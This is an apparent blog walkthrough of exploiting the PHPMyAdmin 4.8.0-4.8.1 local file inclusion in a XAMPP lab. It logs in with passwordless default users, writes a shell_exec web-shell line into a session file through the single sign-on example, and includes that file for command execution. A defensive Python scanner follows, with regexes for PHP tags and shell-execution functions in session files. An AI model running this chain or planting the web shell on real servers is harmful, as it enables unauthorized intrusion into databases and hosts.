Last month, there was a disclosure of an LFI in PHPMyAdmin 4.8.0-4.8.1. Exploitation of this vulnerability may lead to remote code execution.

The big challenge is that, to be exploited, this vulnerability requires an authenticated user. But fortunately, a default MariaDB installation (I will use MariaDB in this sample case) includes the anonymous and pma users, both with no password.

[screenshot: mysql]

Now I will set up the target environment:

  1. XAMPP for Linux version 7.0.30. This package includes PHPMyAdmin version 4.8.0.1, MariaDB version 10.1.32 and PHP version 7.0.30.
  2. Ubuntu Server 16.04
  3. PHPMyAdmin configuration:
    1. $cfg['Servers'][$i]['AllowNoPassword'] = true; // true by default in XAMPP; other PHPMyAdmin packages might differ
    2. Comment out the 3 lines under "Authentication type" so that we must provide a user/password to log in to PHPMyAdmin.
       [screenshot: xampp-conf2]
    3. Change the file /opt/lampp/etc/extra/httpd-xampp.conf so that PHPMyAdmin can be accessed from the network.
       [screenshot: xampp-conf1]


Now, the steps of exploitation:

  1. Log in to PHPMyAdmin using the anonymous or pma user. [screenshot: phpmyadmin1] Who needs a password if blank is just enough 😀 [screenshot: phpmyadmin2]
  2. Let's test the vulnerability. [screenshot: phpmyadmin3]
  3. For more fun, let's escalate to RCE. First, we need to write PHP code onto the server. We can use the PHPMyAdmin example script for single sign-on. Why do I use this script? Because we can write any string into the session without needing to log in. Maybe this trick will be useful for other LFI issues 😀. Write this code into the username field:
       <pre><?php echo shell_exec($_GET["shell"]);?>
     [screenshot: phpmyadmin4] Then click submit, and check for a cookie named SignonSession. [screenshot: phpmyadmin5] Check the session file on the target server: the PHP code has been successfully written. [screenshot: phpmyadmin6]
  4. Now, include the session file through PHPMyAdmin and add the GET variable shell. [screenshot: phpmyadmin7] And the OS command dir is executed.
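Because the trick above depends on a PHP open tag landing inside a PHP session file, a defender can sweep session.save_path for session files that contain PHP tags or shell-execution functions, which never belong in serialized session data. The following scanner is an added example, not code from the post or from PHPMyAdmin; the sample session payloads are constructed, and the directory layout, sess_ file prefix and regexes are assumptions.

```python
import os
import re
import tempfile
from typing import Dict, List

# Constructed sample session contents (not real captures): a benign
# single sign-on session, and one carrying the PHP tag the post describes.
BENIGN = 'PMA_single_signon_user|s:3:"pma";PMA_single_signon_password|s:0:"";'
TAINTED = 'PMA_single_signon_user|s:45:"<pre><?php echo shell_exec($_GET["shell"]);?>";'

PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)
EXEC_FUNC = re.compile(r'\b(shell_exec|system|passthru|exec|eval)\s*\(', re.IGNORECASE)


def inspect_session(data: str) -> List[str]:
    """Return findings for one session payload; an empty list means clean."""
    findings = []
    if PHP_TAG.search(data):
        findings.append("php-open-tag")
    if EXEC_FUNC.search(data):
        findings.append("exec-function")
    return findings


def scan_session_dir(path: str) -> Dict[str, List[str]]:
    """Scan every sess_* file under a session.save_path; map suspicious files to findings."""
    results: Dict[str, List[str]] = {}
    for name in sorted(os.listdir(path)):
        if not name.startswith("sess_"):
            continue  # assumption: PHP's default file-handler naming
        with open(os.path.join(path, name), "r", encoding="utf-8", errors="replace") as fh:
            findings = inspect_session(fh.read())
        if findings:
            results[name] = findings
    return results


def demo() -> Dict[str, List[str]]:
    """Write the constructed samples into a temporary session directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in (("sess_clean", BENIGN), ("sess_tainted", TAINTED)):
            with open(os.path.join(tmp, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_session_dir(tmp)


if __name__ == "__main__":
    for fname, hits in demo().items():
        print(f"{fname}: {', '.join(hits)}")
```

On a real host, point scan_session_dir at the session.save_path reported by phpinfo() and alert on any hit; a session store that legitimately contains "<?php" is essentially unheard of.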